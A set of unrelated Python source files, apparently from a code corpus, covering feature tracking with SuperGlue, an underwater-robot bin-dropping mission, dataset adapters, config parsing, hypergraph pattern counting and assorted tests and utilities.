'nms_radius': opt.nms_radius,
'keypoint_threshold': opt.keypoint_threshold,
'max_keypoints': opt.max_keypoints
},
'superglue': {
'weights': opt.superglue,
'sinkhorn_iterations': opt.sinkhorn_iterations,
'match_threshold': opt.match_threshold,
}
}
superpoint = SuperPoint(config.get('superpoint', {})).cuda()
superpoint = superpoint.eval()
superglue = SuperGlue(config.get('superglue', {})).cuda()
superglue = superglue.eval()
ROOT_DIR = opt.ego_dataset_folder
OUTPUT_DIR = 'superglue_track'
if not os.path.exists(os.path.join(ROOT_DIR, OUTPUT_DIR)):
os.mkdir(os.path.join(ROOT_DIR, OUTPUT_DIR))
# EXTRACT KPTS AND DESCRIPTORS, RUN ONCE!
if opt.extract_descriptor:
loc_list = []
des_list = []
superpoints_list = []
all_images = np.arange(0, len(fnmatch.filter(os.listdir(os.path.join(ROOT_DIR, 'color')), '*.jpg')), step=1)
for index in tqdm(all_images):
color_info = os.path.join(ROOT_DIR, 'color/color_%07d.jpg' % index)
_, gray_tensor, scale = read_image(color_info, 'cpu', resize=[640, 480], rotation=0, resize_float=False)
gray_tensor = gray_tensor.reshape(1, 1, 480, 640)
input_batch = {'image': gray_tensor.cuda()}
with torch.no_grad():
output = superpoint(input_batch)
output_ = {k: [output[k][i].detach().cpu()\
for i in range(len(output[k]))]\
for k in output}
output_['scale']=scale
superpoints_list.append(output_)
output_np = {k: [output[k][i].detach().cpu().numpy()\
for i in range(len(output[k]))]\
for k in output}
des = np.asarray(output_np['descriptors'][0])
loc = np.asarray(
[output_np['keypoints'][0][j] * scale\
for j in range(output_np['keypoints'][0].shape[0])
]
)
loc_list.append(loc)
des_list.append(des.transpose())
torch.save(superpoints_list, '%s/superpoints.pkl' % os.path.join(ROOT_DIR, OUTPUT_DIR))
np.savez('%s/keypoints.npz' % os.path.join(ROOT_DIR, OUTPUT_DIR), loc_list)
np.savez('%s/descriptors.npz' % os.path.join(ROOT_DIR, OUTPUT_DIR), des_list)
else:
# -- load superpoint output
superpoint_filename=os.path.join(ROOT_DIR, OUTPUT_DIR, 'superpoints.pkl')
assert os.path.isfile(superpoint_filename)
superpoints_list=torch.load(superpoint_filename)
superglue_conf_thresh=0.9
num_images = len(superpoints_list)
print('num image: ', num_images)
K = np.loadtxt('%s/intrinsics.txt' % ROOT_DIR)
original_image_id_list = np.arange(0,
len(fnmatch.filter(os.listdir(opt.ego_dataset_folder + '/color/'),
'*.jpg')),
step=1)
assert num_images == len(original_image_id_list)
def get_tracks_parallel(inputs):
i = inputs['i']
superpoints_list = inputs['superpoints_list']
K = inputs['K']
loc = superpoints_list[i]['keypoints'][0].numpy()
num_points = loc.shape[0]
num_images = len(superpoints_list)
track_i = {}
for j in range(i + 1, min(num_images, i + 5)):
# Match features between the i-th and j-th images
x1, x2, ind1, ind2, conf = SuperGlueMatcher(
superglue,
superpoints_list[i],
superpoints_list[j]
)
m = conf > superglue_conf_thresh
x1 = x1[m]
x2 = x2[m]
ind1 = ind1[m].astype(int)
ind2 = ind2[m].astype(int)
num_points_j = superpoints_list[j]['keypoints'][0].shape[0]
track_i[j] = -np.ones(num_points_j, dtype=int)
track_i[j][ind2] = ind1
return (i, track_i)
inputs = [{'i':i,
'superpoints_list':superpoints_list.copy(),
'K':K.copy()} for i in range(num_images - 1)]
# build track dictionary
track_dict = {}
for x in tqdm(inputs):
r = get_tracks_parallel(x)
if r is None: continue
i, track_i = r
# merge the current track dict with the main one
for j, v in track_i.items():
if j not in track_dict:
track_dict[j] = {}
assert i not in track_dict[j]
track_dict[j][i] = v.tolist()
json.dump(track_dict,
open(os.path.join(
ROOT_DIR,
OUTPUT_DIR,
'track_dict.json'
),
'w')
)
# build track matrix
# NOTE: This will potentially generate duplicates
# this is just redondant information for the 3D Triangulation
def fetch_graph(g, i, f_idx, start_i):
# prevent from matching features more than 20frames apart
if (start_i-i) > 20:
return []
if i not in g:
return []
output = []
for j, v in g[i].items():
if v[f_idx] > -1:
output.append((i, f_idx))
for x in fetch_graph(g, j, v[f_idx], start_i):
output.append(x)
# only one match per image for each feature
break
return output
inputs = [
{'i':i,
'track_dict': track_dict.copy(),
'superpoints_list': superpoints_list.copy(),
'K': K.copy(),
} for i in range(num_images, 0, -1)
]
track = []
for x in tqdm(inputs):
i = x['i']
track_dict = x['track_dict']
superpoints_list = x['superpoints_list']
K = x['K']
if i in track_dict:
scale = superpoints_list[i]['scale']
for f_idx in range(superpoints_list[i]['keypoints'][0].shape[0]):
tmp_track = -np.ones((num_images,2))
mask = np.zeros(num_images)
tracklets = fetch_graph(track_dict, i, f_idx, i)
if not tracklets: continue
for tr in tracklets:
if not tr: continue
k, tmp_f_idx = tr
tmp_track[k,:]=superpoints_list[k]['keypoints'][0][tmp_f_idx].cpu().numpy().copy() * scale
mask[k] = 1
count = np.sum(mask)
if count > 3:
mask = mask.astype(bool)
# normalize indices
tmp_track_n = np.hstack([tmp_track,
np.ones((tmp_track.shape[0], 1))]) @ np.linalg.inv(K).T
tmp_track_n = tmp_track_n[:, :2]
tmp_track_n[~mask] = -1000
tmp_track_n = np.expand_dims(tmp_track_n, axis=1)
track.append(tmp_track_n)
track = np.concatenate(track, axis=1)
np.save('%s/track.npy' % os.path.join(ROOT_DIR, OUTPUT_DIR), track)
np.save('%s/original_image_id.npy' % os.path.join(ROOT_DIR, OUTPUT_DIR), original_image_id_list)
print('total number of feature: ', track.shape[1])
|
499701
|
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy_serializer import SerializerMixin
Base = declarative_base(cls=SerializerMixin)
|
499705
|
import shm
from shm.watchers import watcher
from mission.framework.task import Task
from mission.framework.targeting import PIDLoop
from mission.framework.combinators import (
Sequential,
Concurrent,
MasterConcurrent,
Retry,
Conditional,
Defer,
)
from mission.framework.movement import (
Depth,
RelativeToInitialDepth,
RelativeToCurrentDepth,
VelocityX,
VelocityY,
RelativeToInitialHeading,
)
from mission.framework.timing import Timer, Timeout, Timed
from mission.framework.primitive import (
Zero,
FunctionTask,
NoOp,
Log,
Succeed,
Fail,
)
from mission.framework.actuators import FireActuator
from mission.framework.position import MoveX, MoveXY, PositionalControl, MoveXYRough
from mission.framework.track import (
Matcher,
Match,
Observation,
HeadingInvCameraCoord,
)
from mission.missions.ozer_common import(
ConsistentTask,
CenterCentroid,
AlignHeadingToAngle,
SearchWithGlobalTimeout,
Except,
GlobalTimeoutError,
Altitude,
AlignAmlan,
AMLANS,
Zeroed,
)
from mission.constants.config import bins as constants
"""
Bins 2017!
"""
class Vision(Task):
# Bin IDs
TARGET_BIN = 0 # The bin that was originally covered (even if not currently)
OTHER_BIN = 1 # The bin that was never covered
class BinObs(HeadingInvCameraCoord):
def __init__(self, shm_bin, heading):
super().__init__(shm_bin.x, shm_bin.y, heading)
self.adopt_attrs(shm_bin)
def __init__(self, *args, **kwargs):
super().__init__()
# Vision object needs to be ready for rest of mission to access, so must
# initialize before on_first_run()
shm.vision_debug.color_r.set(0)
shm.vision_debug.color_g.set(200)
shm.vision_debug.color_b.set(255)
self.bins_matcher = Matcher(
[], # We don't know the bins' relative positions ahead of time
num_trackers=2,
)
self.watcher = watcher()
self.watcher.watch(shm.bins_vision)
self.pull()
def on_run(self, *args, **kwargs):
if self.watcher.has_changed():
self.pull()
def coords(self, objs, filter=lambda x: True):
return [(obj.obs.x, obj.obs.y) for obj in objs if obj.obs is not None and filter(obj)]
def target_bin(self):
targets = [bin for bin in self.bins if bin.id == self.TARGET_BIN]
if len(targets) >= 1:
return targets[0]
else:
return None
def classify(self, single_bin=False):
required_bins = 1 if single_bin else 2
if sum(bin.obs is not None for bin in self.bins) < required_bins:
self.loge('Failed to classify, less than {} bin{} available'.format(
required_bins,
'' if required_bins == 1 else 's',
))
return False
covered, uncovered = [], []
for bin in self.bins:
if bin.obs is not None:
(covered if bin.obs.covered else uncovered).append(bin)
if single_bin:
# Prioritize uncovered bin
if len(uncovered) > 0:
target = uncovered[0]
other = covered[0] if len(covered) > 0 else None
else: # Guaranteed at least one bin exists somewhere
target = covered[0]
other = uncovered[0] if len(uncovered) > 0 else None
pattern = [Match(self.TARGET_BIN, target.obs)]
if other is not None:
pattern.append(Match(self.OTHER_BIN, other.obs))
else:
# If two of the same kind of bin detected, guess a classification
def log_same_kind(t):
self.logw('Two {} bins detected, guessing the target/other classification'.format(t))
if len(covered) == 2:
log_same_kind('covered')
target, other = tuple(covered)
elif len(uncovered) == 2:
log_same_kind('uncovered')
target, other = tuple(uncovered)
else: # Guaranteed one bin in each category
target, other = covered[0], uncovered[0]
pattern = [
Match(self.TARGET_BIN, target.obs),
Match(self.OTHER_BIN, other.obs),
]
self.bins_matcher.update_pattern(pattern)
return True
def pull(self):
shm_bins = [
shm.bins_bin0.get(),
shm.bins_bin1.get(),
]
heading = shm.kalman.heading.get()
observations = [self.BinObs(sbin, heading) for sbin in shm_bins if sbin.visible]
self.bins = self.bins_matcher.match(observations)
# Debug locations
for i, bin in enumerate(self.bins):
debug_info_g = shm._eval('vision_debug{}'.format(i))
debug_info = debug_info_g.get()
if bin.obs is None:
debug_info.text = bytes('', 'utf8')
else:
if bin.id is not None:
debug_info.text = bytes('Target bin' if bin.id == self.TARGET_BIN else 'Other bin', 'utf8')
else:
debug_info.text = bytes('Bin {}'.format(i), 'utf8')
debug_info.x, debug_info.y = bin.obs.x, bin.obs.y
debug_info_g.set(debug_info)
class Bins(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Except(Sequential(
Log('Starting bins'),
Log('Attempting bins assuming both are visible'),
Conditional(
TryBins(vision, single_bin=False),
on_fail=Sequential(
Log('Attempting bins assuming only one is visible'),
TryBins(vision, single_bin=True),
),
)
), Fail(), GlobalTimeoutError),
Log('Bins success! :O'),
Fail(Sequential(Zero(), FastDrop(), Log('Bins failure! :('))),
))
class TryBins(Task):
""" Try to complete bins given a certain number of bins to look for """
def on_first_run(self, vision, single_bin, *args, **kwargs):
self.use_task(Sequential(
Log('Retracting Amlan'),
AMLANS[0].FastRetract(),
Conditional(
Retry(lambda: ClassifyBins(vision, single_bin), 3),
on_fail=Fail(Log('Failed to ever classify bins')),
),
Conditional(
Retry(lambda: Uncover(vision), 3),
on_fail=Fail(Log('Failed to ever remove cover')),
),
Conditional(
Retry(lambda: Drop(vision), 3),
on_fail=Fail(Log('Failed to ever accurately drop markers')),
),
))
class ClassifyBins(Task):
def on_first_run(self, vision, single_bin, *args, **kwargs):
self.use_task(Conditional(
Sequential(
MoveAboveBins(vision),
Timer(0.5), # Wait for vision to stabilize
FunctionTask(lambda: vision.classify(single_bin)),
),
Log('Bins classified'),
Fail(Log('Failed to classify bins')),
))
class Uncover(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Retry(lambda: MoveAboveBins(vision), 3),
RemoveCover(vision),
),
Log('Bin uncovered!'),
Fail(Log('Failed to uncover bin')),
))
class MoveAboveBins(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Log('Moving to depth where bins are visible'),
Depth(constants.see_both_depth, error=0.2, *args, **kwargs),
Log('Searching for bin'),
MasterConcurrent(IdentifyBin(vision), SearchWithGlobalTimeout()),
Log('Centering bins'),
CenterBins(vision),
),
on_fail=Fail(Log('Failed to move above bins')),
))
class IdentifyBin(Task):
def on_run(self, vision, *args, **kwargs):
if any(bin.obs is not None for bin in vision.bins):
self.finish()
class CenterBins(Task):
def on_first_run(self, vision, filter=lambda bin: True, precision=0, *args, **kwargs):
def bin_points():
return [
(bin.obs.x, bin.obs.y) for bin in vision.bins
if bin.obs is not None and filter(bin)
]
self.use_task(CenterCentroid(bin_points, precision=precision))
class RemoveCover(Task):
def on_first_run(self, vision, *args, **kwargs):
def check_removed():
bin = vision.target_bin()
return bin is not None and not bin.obs.covered
def CheckRemoved():
return FunctionTask(check_removed)
self.use_task(Zeroed(Conditional(
Sequential(
MoveAboveBins(vision),
Conditional(
CheckRemoved(),
Log('The cover is already gone?!?'),
Sequential(
Zero(),
AlignOverTargetBin(vision, 90),
LiftOffCover(vision),
Log('Verifying the cover was removed'),
MoveAboveBins(vision),
CheckRemoved(),
),
),
),
on_fail=Fail(Log('Failed to remove cover')),
)))
class LiftOffCover(Task):
PICKUP_DELTA_DEPTH = 0.4
DELTA_DEPTH_TIMEOUT = 4
TOTAL_TIMEOUT = 60
SLIDE_SPEED = 0.4
SLIDE_TIME = 4
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Zeroed(Timeout(
Sequential(
Log('Attempting to grab handle'),
GetHandle(vision, AMLANS[0]),
Log('Carrying cover away'),
RelativeToInitialDepth(-self.PICKUP_DELTA_DEPTH, error=0.1),
Timed(VelocityX(self.SLIDE_SPEED), self.SLIDE_TIME),
Zero(),
Log('Dropping cover off here'),
AMLANS[0].Retract(),
Timer(1.5),
Log('Attempting to return to near pre-grab location'),
RelativeToInitialDepth(-1),
Timed(VelocityX(-self.SLIDE_SPEED), self.SLIDE_TIME * 5 / 6),
Zero(),
), self.TOTAL_TIMEOUT)))
class GetHandle(Task):
GRAB_TIME = 4
def on_first_run(self, vision, amlan, *args, **kwargs):
self.use_task(Zeroed(Sequential(
Log('Aligning Amlan'),
AlignAmlan(
vision,
vision.target_bin,
amlan,
Depth(constants.above_bin_depth),
),
Log('Moving to handle grab depth'),
Timed(Depth(constants.grab_depth), self.GRAB_TIME),
Log('Extending Amlan'),
amlan.Extend(),
Timer(2),
)))
class AlignOverTargetBin(Task):
TIMEOUT = 40
def on_first_run(self, vision, angle, double_align=False, *args, **kwargs):
def CenterTargetBin(precision):
return CenterBins(vision, lambda bin: bin.id == vision.TARGET_BIN, precision=precision)
def AlignTargetBin():
return AlignHeadingToAngle(lambda: vision.target_bin().obs.angle, angle, mod=180)
def DepthAlign(depth):
return Concurrent(
AlignTargetBin(),
CenterTargetBin(1),
Depth(depth),
finite=False,
)
self.task = Zeroed(Timeout(Sequential(
Log('Centering over target bin'),
CenterTargetBin(0),
Log('Aligning target bin'),
Concurrent(
AlignTargetBin(),
CenterTargetBin(0),
finite=False,
),
Log('Going half down to precisely align with target bin'),
DepthAlign((constants.see_both_depth + constants.above_bin_depth) / 2),
Sequential(
Log('Going down to fully align to bin'),
DepthAlign(constants.above_bin_depth),
) if double_align else NoOp(),
Zero(),
PositionalControl(),
), self.TIMEOUT))
def on_run(self, vision, *args, **kwargs):
if vision.target_bin() == None:
self.loge('Failed to align over target bin, lost bin')
self.finish(success=False)
Zero()()
else:
self.task()
if self.task.finished:
self.finish(success=self.task.success)
class AlignBinDepth(Task):
def on_first_run(self, vision, bin_func, *args, **kwargs):
self.use_task(ConsistentTask(PIDLoop(
input_value=lambda: bin_func().obs.length,
output_function=RelativeToCurrentDepth(),
target=1.2,
deadband=0.02,
p=0.7,
d=0.3,
)))
class Drop(Task):
def on_first_run(self, vision, *args, **kwargs):
self.use_task(Conditional(
Sequential(
Log('Starting drop'),
Retry(lambda: MoveAboveBins(vision), 3),
AlignOverTargetBin(vision, 90, double_align=True),
FireMarkers(),
),
on_fail=Fail(Log('Failed to drop')),
))
class FireMarkers(Task):
MARKERS_X_OFFSET = -0.04
FIRE_TIME = 0.5
def on_first_run(self, *args, **kwargs):
self.use_task(Sequential(
Log('Firing markers!'),
MoveX(-self.MARKERS_X_OFFSET, deadband=0.02),
FireActuator('left_marker', self.FIRE_TIME),
FireActuator('right_marker', self.FIRE_TIME),
))
class FastDrop(Task):
def on_first_run(self, *args, **kwargs):
self.use_task(Sequential(
Log('Dropping markers quickly wherever we are now'),
FireMarkers(),
))
class VisionTask(Task):
def on_first_run(self, task_func, *args, **kwargs):
vision = Vision()
self.use_task(MasterConcurrent(task_func(vision, *args, **kwargs), vision))
def Full(): return VisionTask(Bins)
def Found(): return ConsistentTask(VisionTask(IdentifyBin), success=20, total=30)
|
499731
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pytest # type: ignore
def pytest_addoption(parser):
parser.addoption(
"--can-out-interface", default="None",
action="store",
help="The CAN interface to use with the tests")
parser.addoption(
"--can-in-interface", default="None",
action="store",
help="The CAN interface to use with the tests")
parser.addoption(
"--lin-out-interface", default="None",
action="store",
help="The LIN interface to use with the tests")
parser.addoption(
"--lin-in-interface", default="None",
action="store",
help="The LIN interface to use with the tests")
@pytest.fixture
def can_in_interface(request):
interface = request.config.getoption("--can-in-interface")
if interface.lower() == "none":
pytest.skip("Test requires a CAN board")
return interface
@pytest.fixture
def can_out_interface(request):
interface = request.config.getoption("--can-out-interface")
if interface.lower() == "none":
pytest.skip("Test requires a CAN board")
return interface
@pytest.fixture
def lin_in_interface(request):
interface = request.config.getoption("--lin-in-interface")
if interface.lower() == "none":
pytest.skip("Test requires a LIN board")
return interface
@pytest.fixture
def lin_out_interface(request):
interface = request.config.getoption("--lin-out-interface")
if interface.lower() == "none":
pytest.skip("Test requires a LIN board")
return interface
@pytest.fixture
def custom_database_path():
tests_path = os.path.dirname(__file__)
root_path = os.path.dirname(tests_path)
database_path = os.path.join(root_path, 'nixnet_examples', 'databases', 'custom_database.dbc')
return database_path
|
499735
|
from itertools import chain
import torch
import numpy as np
import glob
import os
import MYTH
from datasets.dataset_adapter import DatasetAdapter
from local_config import base_data_folder
import os
class FlyingThingsAdapter(DatasetAdapter):
"""Adapter for the synthetic Flying Things dataset."""
base_datapath = os.path.join(base_data_folder, 'flying_things_MVS/')
im_width = 1920
im_height = 1080
nr_views = 10
im_scale = 0.25
def __init__(self, **kwargs):
super().__init__(**kwargs)
input_scale = self.im_scale
if input_scale <= 0.25:
input_scale = 0.25
elif input_scale <= 0.50:
input_scale = 0.50
self.camera_scaling = self.im_scale / input_scale
self.datapath = FlyingThingsAdapter.base_datapath.replace('flying_things_MVS', 'flying_things_MVS_%.02f' % input_scale)
self._set_default_splits()
def _set_default_splits(self):
all_elements = self._all_elements()
testing_size = int(len(all_elements)*0.02)
val_size = int(len(all_elements)*0.28)
self.split['test'] = all_elements[:testing_size]
if(val_size > 0):
self.split['val'] = all_elements[-val_size:]
self.split['train'] = all_elements[testing_size:-val_size]
else:
self.split['train'] = all_elements[testing_size:]
def _all_elements(self):
return sorted(glob.glob(self.datapath + "*"))
def get_dataset_name(self):
return "FlyingThingsMVS"
@staticmethod
def get_scene_seed(element):
return element.split('_')[-1]
def get_image_path(self, element, view):
image_path = os.path.join(element,
"scene_%s_frame_%03d.png" % (
self.get_scene_seed(element),
view + 1
)
)
return image_path
def get_depth_map_path(self, element, view, gt=True):
depth_map_path = os.path.join(element,
"%sscene_%s_frame_%03d_depth.npy" % (
"" if gt else self.depth_map_prefix,
self.get_scene_seed(element),
view + 1
)
)
return depth_map_path
def get_normal_map_path(self, element, view, gt=True):
raise NotImplementedError("Normals not implemented for Flying Things MVS")
def get_element_cameras(self, element):
cameras = []
scaler = np.array([[self.camera_scaling, 0, 0], [0, self.camera_scaling, 0], [0, 0, 1]])
for view in range(self.nr_views):
camera_filename = os.path.join(element,
"scene_%s_frame_%03d.png.P" % (
self.get_scene_seed(element),
view + 1
)
)
camera_matrix = np.matmul(scaler, np.loadtxt(camera_filename))
cameras.append(torch.from_numpy(camera_matrix.astype(np.float32)).unsqueeze(0))
return torch.cat(cameras, 0)
def get_element_worldtf(self, element):
world_transform = torch.from_numpy(np.eye(4).astype(np.float32))
return world_transform
valid_centerviews = range(0, nr_views)
def get_view_neighbours(self, cameras, center_view, nr_neighbours):
if nr_neighbours == 0:
return []
cameras = cameras.cuda()
B = cameras.shape[0]
camlocs = cameras.new_empty(B, 3, 1)
invKRs = cameras.new_empty(B, 3, 3)
MYTH.InvertCams_gpu(cameras, invKRs, camlocs)
distances = (camlocs - camlocs[center_view:center_view+1,:,:]).pow(2).sum(dim=1).sum(dim=1)
distances = [d.item() for d in distances]
orders = sorted(range(len(distances)), key=distances.__getitem__)
if nr_neighbours >= len(distances):
return orders
if self._neighbour_selection == "closest":
return orders[1:1+nr_neighbours]
elif self._neighbour_selection == "furthest":
return orders[-nr_neighbours:]
elif self._neighbour_selection == "mixed":
return orders[1:1+nr_neighbours//2] + orders[-(nr_neighbours - nr_neighbours//2):]
else:
raise ValueError("Unsupported neighbourhood selection approach '%s'" % self._neighbour_selection)
|
499766
|
import os
import logging
from datetime import datetime
def get_timestamp():
return datetime.now().strftime('%y%m%d-%H%M%S')
def mkdir(path):
if not os.path.exists(path):
os.makedirs(path)
def mkdirs(paths):
if isinstance(paths, str):
mkdir(paths)
else:
for path in paths:
mkdir(path)
def mkdir_and_rename(path, archive_name=None):
if os.path.exists(path):
new_name = path + '_archived_' + archive_name
print('Path already exists. Rename it to [{:s}]'.format(new_name))
logger = logging.getLogger('base')
logger.info('Path already exists. Rename it to [{:s}]'.format(new_name))
choice = input('Are you sure? y/[n]')
if choice is not 'y':
print('Give up renaming, exit')
exit(0)
os.rename(path, new_name)
os.makedirs(path)
|
499782
|
import collections.abc
import copy
import importlib
import yaml
import jinja2
from .parser_constants import FIRECROWN_RESERVED_NAMES
def parse(config_or_filename):
"""Parse a configuration file.
Parameters
----------
config_or_filename : str or dict
The config file to parse or an already parsed config dictionary.
If a file, the file should be YAML formatted.
Returns
-------
config : dict
The raw config file as a dictionary.
data : dict
A dictionary containg each analyses key replaced with its
corresponding data and function to compute the log-likelihood.
"""
if not isinstance(config_or_filename, collections.abc.MutableMapping):
with open(config_or_filename, 'r') as fp:
config_str = jinja2.Template(fp.read()).render()
config = yaml.load(config_str, Loader=yaml.Loader)
data = yaml.load(config_str, Loader=yaml.Loader)
else:
config = copy.deepcopy(config_or_filename)
data = copy.deepcopy(config_or_filename)
params = {}
for p, val in data['parameters'].items():
if isinstance(val, list) and not isinstance(val, str):
params[p] = val[1]
else:
params[p] = val
data['parameters'] = params
analyses = list(set(list(data.keys())) - set(FIRECROWN_RESERVED_NAMES))
for analysis in analyses:
new_keys = {}
try:
mod = importlib.import_module(data[analysis]['module'])
except Exception:
print("Module '%s' for analysis '%s' cannot be imported!" % (
data[analysis]['module'], analysis))
raise
new_keys = {}
if hasattr(mod, 'parse_config'):
new_keys['data'] = getattr(mod, 'parse_config')(data[analysis])
new_keys['eval'] = getattr(mod, 'compute_loglike')
new_keys['write'] = getattr(mod, 'write_stats')
else:
raise ValueError("Analsis '%s' could not be parsed!" % (analysis))
data[analysis] = new_keys
return config, data
|
499840
|
import sys,os
#sys
# li = sys.argv
#
# if li[1] == "post":
# print("post")
# elif li[1] == "down":
# print("1111")
'''
sys.argv #在命令行参数是一个空列表,在其他中第一个列表元素中程序本身的路径
sys.exit(n) #退出程序,正常退出时exit(0)
sys.version #获取python解释程序的版本信息
sys.path #返回模块的搜索路径,初始化时使用python PATH环境变量的值
sys.platform #返回操作系统平台的名称
sys.stdin #输入相关
sys.stdout #输出相关
sys.stderror #错误相关
# 常用sys模块的方法
'''
# print(sys.path)
# print(os.getcwd())
# os.chdir("E:\\linuxvideo")
# print(os.getcwd())
# makedirs(name, mode=0o777, exist_ok=False):
# os.makedirs(r"aa\bb\cc")
# os.removedirs(r"aa\bb")
# print(os.listdir(os.getcwd()))
# print(os.stat("file.py").st_size)
# os.rename("aa","bb")
#
# print(__file__) #获取当前文件路劲的文件名
# print(os.path.abspath(__file__))
# print(os.path.split(os.path.abspath(__file__)))
print(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) #返回当前文件的上一级目录
# # os.path.join(path1[, path2[, ...]]) 将多个路径组合后返回,第一个绝对路径之前的参数将被忽略
# print(os.path.join("d:\\"))
# print(os.path.join("d:\\","www","baidu","a.py"))
print(os.getcwd())
print(os.path.dirname(os.path.abspath(__file__)))
print(os.path.join(os.path.dirname(os.path.abspath(__file__)),"bb","123.txt"))
|
499843
|
from collections import Counter
from graphbrain import hedge
from graphbrain.hyperedge import edge_matches_pattern
argrole_order = {
'm': -1,
's': 0,
'p': 1,
'a': 2,
'c': 3,
'o': 4,
'i': 5,
't': 6,
'j': 7,
'x': 8,
'r': 9,
'?': 10
}
def normalize_edge(edge):
if edge.is_atom():
return edge
conn = edge[0]
ar = conn.argroles()
if ar != '':
roles_edges = zip(ar, edge[1:])
roles_edges = sorted(roles_edges,
key=lambda role_edge: argrole_order[role_edge[0]])
ar = ''.join([role_edge[0] for role_edge in roles_edges])
pred = conn.atom()
new_pred = hedge('{}/{}.{}'.format(pred.root(), pred.type(), ar))
conn = conn.replace_atom(pred, new_pred)
edge = hedge([conn] + list(role_edge[1] for role_edge in roles_edges))
return hedge([normalize_edge(subedge) for subedge in edge])
def edge2pattern(edge, root=False, subtype=False):
if root and edge.is_atom():
root_str = edge.root()
else:
root_str = '*'
if subtype:
et = edge.type()
else:
et = edge.type()[0]
pattern = '{}/{}'.format(root_str, et)
ar = edge.argroles()
if ar == '':
return hedge(pattern)
else:
return hedge('{}.{}'.format(pattern, ar))
def inner_edge_matches_pattern(edge, pattern):
if edge.is_atom():
return False
for subedge in edge:
if edge_matches_pattern(subedge, pattern):
return True
for subedge in edge:
if inner_edge_matches_pattern(subedge, pattern):
return True
return False
class PatternCounter:
def __init__(self,
depth=2,
count_subedges=True,
expansions={'*'},
match_roots=set(),
match_subtypes=set()):
self.patterns = Counter()
self.depth = depth
self.count_subedges = count_subedges
self.expansions = expansions
self.match_roots = match_roots
self.match_subtypes = match_subtypes
def _matches_expansions(self, edge):
for expansion in self.expansions:
if edge_matches_pattern(edge, expansion):
return True
return False
def _force_subtypes(self, edge):
force_subtypes = False
for st_pattern in self.match_subtypes:
if edge_matches_pattern(edge, st_pattern):
force_subtypes = True
return force_subtypes
def _force_root_expansion(self, edge):
force_root = False
force_expansion = False
for root_pattern in self.match_roots:
if edge_matches_pattern(edge, root_pattern):
force_root = True
force_expansion = True
elif inner_edge_matches_pattern(edge, root_pattern):
force_expansion = True
return force_root, force_expansion
def _list2patterns(self, ledge, depth=1, force_expansion=False,
force_root=False, force_subtypes=False):
if depth > self.depth:
return []
first = ledge[0]
f_force_subtypes = force_subtypes | self._force_subtypes(first)
f_force_root, f_force_expansion = self._force_root_expansion(first)
f_force_root |= force_root
f_force_expansion |= force_expansion
root = force_root | f_force_root
if f_force_expansion and not first.is_atom():
hpats = []
else:
hpats = [edge2pattern(first, root=root, subtype=f_force_subtypes)]
if not first.is_atom() and (self._matches_expansions(first) or
f_force_expansion):
hpats += self._list2patterns(
list(first), depth + 1, force_expansion=f_force_expansion,
force_root=f_force_root, force_subtypes=f_force_subtypes)
if len(ledge) == 1:
patterns = [[hpat] for hpat in hpats]
else:
patterns = []
for pattern in self._list2patterns(
ledge[1:], depth=depth, force_expansion=force_expansion,
force_root=force_root, force_subtypes=force_subtypes):
for hpat in hpats:
patterns.append([hpat] + pattern)
return patterns
def _edge2patterns(self, edge):
force_subtypes = self._force_subtypes(edge)
force_root, _ = self._force_root_expansion(edge)
return list(hedge(pattern)
for pattern
in self._list2patterns(list(normalize_edge(edge)),
force_subtypes=force_subtypes,
force_root=force_root,
force_expansion=False))
def count(self, edge):
if not edge.is_atom():
if self._matches_expansions(edge):
for pattern in self._edge2patterns(edge):
self.patterns[hedge(pattern)] += 1
if self.count_subedges:
for subedge in edge:
self.count(subedge)
|
499898
|
from dataclasses import dataclass
from typing import Iterator, List, Set, Tuple
@dataclass(frozen=True)
class Range:
min_val: int
max_val: int
def lits_to_ranges(
literals: Iterator[int],
) -> Tuple[Set[int], Set[Range]]:
lits = set()
ranges = set()
buf: List[int] = []
for lit in sorted(literals):
if len(buf) and buf[-1] != lit - 1:
# Discontinuity
if len(buf) < 3:
lits.update(buf)
else:
ranges.add(Range(buf[0], buf[-1]))
buf = [lit]
else:
buf.append(lit)
if len(buf) == 1:
lits.add(buf[0])
elif len(buf) > 1:
ranges.add(Range(buf[0], buf[-1]))
return lits, ranges
|
499904
|
from rpython.rlib.objectmodel import specialize
class Cache(object):
def __init__(self, space):
self.space = space
self.contents = {}
@specialize.memo()
def getorbuild(self, key):
try:
return self.contents[key]
except KeyError:
builder = self._build(key)
self.contents[key] = builder.next()
try:
builder.next()
except StopIteration:
pass
else:
raise RuntimeError("generator didn't stop")
return self.contents[key]
def _freeze_(self):
return True
|
500001
|
import pytest
from conftest import generate_unique_name
from lahja import AsyncioEndpoint, ConnectionConfig
@pytest.mark.asyncio
async def test_endpoint_run():
endpoint = AsyncioEndpoint("test-run")
assert endpoint.is_running is False
async with endpoint.run():
assert endpoint.is_running is True
assert endpoint.is_running is False
@pytest.mark.asyncio
async def test_endpoint_run_with_error():
endpoint = AsyncioEndpoint("test-run")
assert endpoint.is_running is False
with pytest.raises(Exception, match="break out of run"):
async with endpoint.run():
assert endpoint.is_running is True
raise Exception("break out of run")
assert endpoint.is_running is False
@pytest.mark.asyncio
async def test_endpoint_serve(ipc_base_path):
config = ConnectionConfig.from_name(generate_unique_name(), base_path=ipc_base_path)
async with AsyncioEndpoint.serve(config) as endpoint:
assert endpoint.is_running is True
assert endpoint.is_serving is True
assert endpoint.is_running is False
assert endpoint.is_serving is False
@pytest.mark.asyncio
async def test_endpoint_serve_with_error(ipc_base_path):
config = ConnectionConfig.from_name(generate_unique_name(), base_path=ipc_base_path)
with pytest.raises(Exception, match="break out of serve"):
async with AsyncioEndpoint.serve(config) as endpoint:
assert endpoint.is_running is True
assert endpoint.is_serving is True
raise Exception("break out of serve")
assert endpoint.is_running is False
assert endpoint.is_serving is False
|
500031
|
from collections import defaultdict
from sklearn.metrics import adjusted_mutual_info_score, normalized_mutual_info_score
def ami(p1, p2):
return adjusted_mutual_info_score(p1, p2)
def nmi(p1, p2):
return normalized_mutual_info_score(p1, p2, average_method='arithmetic')
def all_degrees(G):
return G.degree()
def in_degrees(G):
return G.indegree()
def out_degrees(G):
return G.outdegree()
def membership_to_communities(membership):
communities = defaultdict(list)
